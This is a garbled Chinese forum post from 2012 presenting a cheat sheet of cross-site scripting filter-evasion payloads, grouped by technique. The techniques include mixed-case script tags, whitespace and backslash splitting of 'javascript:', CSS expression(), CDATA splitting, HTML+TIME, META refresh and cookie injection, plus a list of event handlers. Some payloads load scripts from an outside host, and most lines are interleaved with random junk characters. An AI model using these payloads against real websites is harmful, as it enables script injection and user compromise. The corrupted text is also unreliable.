1. 改变字符大小写
2 f5 V3 g0 O) _! E3 L
, ~+ \: S$ A, Y, l1 Q# P , i, L$ P& u/ z" U: h* d. i. @8 w
- L4 ^% p! g7 p <sCript>alert(‘d’)</scRipT>- X, x" @ L# p2 {3 { {
, W% e. |; }" V5 r
2. 利用多加一些其它字符来规避Regular Expression的检查+ l2 L! F& C9 l- V
; R1 N1 ]6 q$ S8 p q
<<script>alert(‘c’)//<</script>
: [1 l4 C6 e- ?$ J; d3 f6 g- y* l, F. R
<SCRIPT a=">" SRC="t.js"></SCRIPT># r, i$ [* k! l7 x
5 @7 Q+ t" V. y7 V2 v" T& q
<SCRIPT =">" SRC="t.js"></SCRIPT>0 Z6 N! c' p. O! S0 o
- e3 j3 {0 J5 J+ O
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
1 J9 r; R* d* Y1 }
( N* L% q( ?& |% K$ d3 W9 S <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
( k1 }) Q$ @; i% l; @+ F; ^- E) W( X B: F) ]* o9 W" C5 K
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
% w a1 ~2 w! K$ {( E" \- H& }% F/ p9 p. J6 s/ s. F
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>$ F5 R/ G) A' ^" m
! e" f, A8 Z/ I3 y" r7 {: a
3. 以其它扩展名取代.js: o6 t- Z4 E: e/ g, p3 q" O
" L$ z( n2 r x+ ~' u! m+ q <script src="bad.jpg"></script>* G7 s* D% m+ O% w
1 M. \8 x4 U0 P+ G4. 将Javascript写在CSS档里
# B& Z4 N) [4 m0 f: w) [1 o z, S0 \
. |4 O8 W+ }9 w' D/ \$ h3 B <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
1 a7 v5 g. m) X: g3 X2 W2 o
) F3 ^% C7 t+ T1 P& D- D+ ^ example:- y0 p ~7 k. q$ G9 p
7 H, ?4 [5 O6 h4 \ body {3 H+ q% X5 A0 s$ d, p
* f" k3 q- j0 z6 a background-image: url(‘javascript:alert("XSS");’)5 R" w$ ]% C0 @. _, l( E! Z. l
& f4 L, O5 `8 B5 U$ a
}! t5 M9 F. o- C, G& Z
: A Q! H) o/ q" R# x5. 在script的tag里加入一些其它字符
. N0 d- q: W% z, }) V% C
' Q' n, Q7 G/ { w$ H# U <SCRIPT/SRC="t.js"></SCRIPT>
- U# [; a! v- l3 g# e4 B$ G" o- @' E
<SCRIPT/anyword SRC="t.js"></SCRIPT>
* r2 Y" _, H6 o- B$ a! H K! D9 p7 _# |
6. 使用tab或是new line来规避
; ^/ u, l5 w0 p8 f0 }+ k
% t7 V3 p1 |7 n( D* t+ t% t <img src="jav ascr ipt:alert(‘XSS3′)">
/ ?2 T: L8 X- o. I4 X. M: @
( d- o) ]. j! e/ n- I <img src="jav ascr ipt:alert(‘XSS3′)"># `! t4 ~2 p9 Q7 i4 C0 X2 q- c
% ^# {1 ~2 \; U% f& I <IMG SRC="jav ascript:alert(‘XSS’);">4 ?- x F% j' @9 i% ?" c
, J; E7 L1 s9 c$ z: ` -> tag
! G0 k1 d. q- l3 B0 U% l% a9 Y2 _1 m. T: W8 q2 M! K, p1 D# W/ ~' u
-> new line
& n6 h# O$ \ u) T, P# q! b' Q! w5 ^8 B' z, [
7. 使用"\"来规避# h. x$ k7 A+ ^
" [7 \+ q V: I; A ^, h <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
3 |) L0 k& [4 X# o2 S
+ v, b. D. }2 g) } <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
5 S6 x% i# z+ T( m c/ M9 ^6 {9 J1 ^' G+ \( }( [ @9 l" Y: a
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">" i+ Z# C& o$ G; e
) g8 K: O. ~: e# Y" Z' W* u
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
O# w1 w6 v" p5 U O# M2 A9 I; B1 S. h) V2 k, [# Q
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>0 z; S. c& Y+ T
) D4 o" F5 d M3 m% |* m {8. 使用Hex encode来规避(也可能会把";"拿掉)& v. a$ Q' D6 {8 m' b( ^
; ^* E! n. F) c m" t6 h <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">- v4 p1 Z6 ~. ^3 Y- u& [
' x( j( V8 F6 C9 k8 Q1 Y! Z3 n 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 ~, K K3 @$ }
( |# O, i) \; K- x7 I <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 r0 h* u- W5 Z6 w& g8 p% h. S7 o
: a; x5 A& e0 p7 u! s0 y- q5 I2 u# p
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">: S% }) T/ Q* Z e9 x* W' d7 Q$ R
* G) d) a; ^, K6 s9 o- }
9. script in HTML tag
0 [) G4 {1 ?4 Q$ F3 [$ q G6 k4 O' A4 G9 g1 l
<body onload=」alert(‘onload’)」>
! n% y1 F! G: h+ d/ V- {+ R1 }
/ P5 q6 j* v$ Y onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
: G. U$ D5 J5 E$ Y' Z8 e' |! v/ C# _% ~0 t) q
10. 在swf里含有xss的code
3 t: } L. J9 q1 |! E+ f+ Z9 |! A
7 M3 g2 X3 N; }5 u, G* Q P <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
1 N! w! I" n7 ?5 ~; V" t% P; r0 X8 ?$ y* M& |) E0 R' c
11. 利用CDATA将xss的code拆开,再组合起来。* y5 w2 E% {2 ?* q" f
( e8 ^9 {0 J0 Z5 T! i <XML ID=I><X><C>; | `( d+ c! t! {6 w! V$ Q
5 S+ z- `$ \4 P: M g* l
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
! P6 h; |4 }5 V6 C( }! W
6 j( n3 R! ~ K( k3 p+ g, k) L </C></X># \6 n. [" g0 Q4 A& M% w
3 b3 J1 g2 p+ e' g </xml>
5 M* y1 J& Q& j: ]) I
% p' V; K0 @$ @+ T1 D6 } <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
7 U/ L) k1 b- o9 u' F i1 E x' j
& ^& t5 e; o3 J- [' t <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
+ a$ `; t4 ^1 V5 w9 Z9 {& _9 _ t5 B/ |1 o! Z' w3 u' u. c
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
' L' ?* Q o+ O$ a
! `! H) _7 u2 z) P, r! O: H12. 利用HTML+TIME。
+ Z6 o- [1 Q q L! o6 ^# y2 i" H
% P" V6 O3 _& q" j6 I+ j <HTML><BODY>+ W- w; K1 s5 p* A& v7 {$ x
$ S2 u/ C; V6 I! K
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"># \+ N i! U5 y; }$ E" P% A/ p
5 q: D$ f: R* T; |" [% R
<?import namespace="t" implementation="#default#time2"># x; T, U5 S! l: s7 X$ _; B; m
6 `% c( N$ E! ^6 ]+ [3 t4 v
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
* x: x* s2 b P6 O% ^$ ~+ U
0 f# l2 e' K/ |; C. u; T </BODY></HTML>/ O, O' E5 ^! D4 r5 C6 b% C0 k
7 d Z' a$ ~* m7 {: c! s2 M. x- N
13. 透过META写入Cookie。
( r4 L* w6 F4 @6 \
* B9 J7 _8 s' q) x+ x4 O0 z* g <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">) t; w, A3 N) N' k4 _: o
2 n* J* b+ K+ A E0 o14. javascript in src , href , url
) [$ q3 O/ z; p5 L& [
. k' r2 X1 Z0 I <IFRAME SRC=javascript:alert(’13′)></IFRAME>
. |3 p6 \: g9 N: C- ]* x0 Q+ F# S/ X3 _; A, r% E/ V* Y8 O
<img src="javascript:alert(‘XSS3′)">
' d% O [$ ]' F a/ S, p/ I) A! X5 z {' R9 I1 f
<IMG DYNSRC="javascript:alert(‘XSS20′)">
1 Z; e1 p: E2 ~) H3 J: N8 L% B0 m6 Q U1 T/ V% s5 }
<IMG LOWSRC="javascript:alert(‘XSS21′)">
5 Z( _8 F" a) m' s9 J$ \. A$ T. \3 b
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);"># i7 s, Z L3 K
. ]9 {" c4 i5 y. J! A. T3 P5 f9 ]
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>0 Q" K. R- E. K. ? ^9 U$ g7 C# Y
7 @1 _: J# D3 n <TABLE BACKGROUND="javascript:alert(‘XSS29′)">; V5 M$ ~5 ]5 D( p5 m
0 g2 E. P: b! n, z <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">- t1 o1 w3 Q8 N3 J' @6 B' d% ^& l
7 e* C8 `) W" U! j$ f4 P& z4 O
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}/ M& j$ _# h }* _6 V2 ^- {- a
] D0 a5 ^0 S4 S" i) L+ s$ K. ?
</STYLE><A CLASS=XSS></A>
0 D# P. n% i# E( X! G5 ^3 h- o; J
! Q, r: s' G: a% ]: x+ Q' J <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
/ G3 E. c8 _5 ^6 r
1 e x& \7 r/ w |
发表于 2012-12-31 09:59:28
收藏
支持
反对